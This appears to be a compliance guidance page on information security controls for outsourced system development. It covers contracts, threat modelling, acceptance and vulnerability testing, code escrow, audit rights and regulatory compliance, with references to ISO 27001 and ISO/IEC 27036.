Directing, Monitoring, and Reviewing Outsourced System Development Activities
Ensuring that information security measures required by the organisation are effectively implemented in outsourced system development. This involves defining security expectations, establishing clear contractual agreements, and continuously overseeing external development to align with security and compliance requirements.
Guidance
When system development is outsourced, the organisation must establish clear requirements and expectations with external suppliers and continuously monitor and review whether the delivered work meets these expectations. Regular assessment and improvement of supplier relationships ensure that risks associated with outsourced development are minimised. The following aspects should be considered across the organisation’s entire external supply chain:
1. Licensing Agreements and Intellectual Property Rights
Define ownership of the developed code and related intellectual property to avoid conflicts over future use and modifications.
Establish licensing agreements that explicitly state permitted usage, redistribution rights, and any restrictions on modifications.
Ensure that agreements cover liability clauses in case of disputes regarding intellectual property ownership.
2. Contractual Requirements for Secure Development
Ensure contracts include provisions for secure design, coding, and testing practices to mitigate security risks at every stage of development.
Reference security best practices and industry standards such as OWASP, ISO 27001 (see Clauses 8.25 to 8.29), and secure coding frameworks to enforce consistent security measures.
Specify accountability measures for non-compliance with security requirements and establish penalties for security breaches resulting from negligence.
3. Threat Modelling Considerations
Provide external developers with the relevant threat models to ensure security risks are appropriately mitigated.
Require developers to conduct their own threat modelling assessments and document security risk considerations.
Establish a feedback loop where internal security teams review and validate external threat models.
4. Acceptance Testing for Quality and Security
Conduct rigorous acceptance testing to validate the quality, accuracy, and security of deliverables (see Clause 8.29).
Develop clear acceptance criteria for security functionality, ensuring all security features are properly implemented and tested before deployment.
Include penetration testing and vulnerability assessments as part of the acceptance process to identify potential weaknesses before going live.
5. Security and Privacy Assurance Reports
Require suppliers to provide assurance reports demonstrating compliance with minimum security and privacy requirements.
Assess third-party security certifications and adherence to standards such as SOC 2, ISO 27001, and GDPR compliance.
Request security audit reports and documented evidence of security practices in the supplier’s development lifecycle.
6. Testing for Malicious and Unintentional Content
Ensure that deliverables undergo sufficient testing to detect and mitigate malicious content, whether intentional or accidental.
Implement automated code analysis tools to scan for malware, backdoors, and unintentional security vulnerabilities.
Require suppliers to provide evidence of internal security testing, including static and dynamic analysis results.
7. Testing for Known Vulnerabilities
Verify that outsourced software has been tested against known vulnerabilities and security weaknesses, such as those listed in the OWASP Top 10 and CVE databases.
Implement regular vulnerability scanning and penetration testing schedules for outsourced applications and components.
Require suppliers to maintain a vulnerability disclosure program, ensuring any discovered issues are promptly reported and addressed.
8. Escrow Agreements for Source Code
Establish escrow agreements to protect business continuity in case the supplier goes out of business or is unable to maintain the software.
Ensure that the escrow agreement includes provisions for access to the latest source code, development documentation, and build environments.
Specify under what circumstances the escrow agreement can be invoked and define the process for transitioning maintenance responsibilities to another provider.
9. Right to Audit Development Processes
Include contractual provisions granting the organisation the right to audit the supplier’s development processes and security controls.
Perform periodic security audits and compliance assessments to verify that the supplier adheres to agreed security practices.
Establish a structured reporting process where suppliers regularly provide security updates, risk assessments, and mitigation plans.
10. Security of the Development Environment
Ensure that the supplier’s development environment meets security requirements, including access control, data protection, and secure coding practices (see Clause 8.31).
Require developers to use secure development environments (e.g., isolated build environments, restricted network access, and robust authentication mechanisms).
Specify requirements for secure configuration management, ensuring that development, testing, and production environments remain separate and protected.
11. Compliance with Legal and Regulatory Requirements
Consider applicable legislation related to data protection, cybersecurity, and intellectual property rights to ensure compliance.
Ensure that suppliers adhere to local and international regulatory requirements, including GDPR, HIPAA, PCI-DSS, and any industry-specific mandates.
Implement a legal review process to verify that contractual obligations align with current compliance frameworks and evolving regulations.
Continuous Improvement and Review
To maintain high security standards in outsourced development, organisations should:
Establish a regular review cycle to assess the effectiveness of security controls in supplier relationships.
Encourage continuous improvement in security practices through collaborative engagement with suppliers.
Develop contingency plans for supplier failures, ensuring that security risks do not disrupt business operations.
Additional Resources
For more comprehensive guidance on supplier relationships, organisations should refer to the ISO/IEC 27036 series, which provides detailed recommendations on managing security risks in supplier relationships. Regular engagement with industry groups and security communities can also help in staying informed about evolving threats and best practices in outsourced development security.
Comentários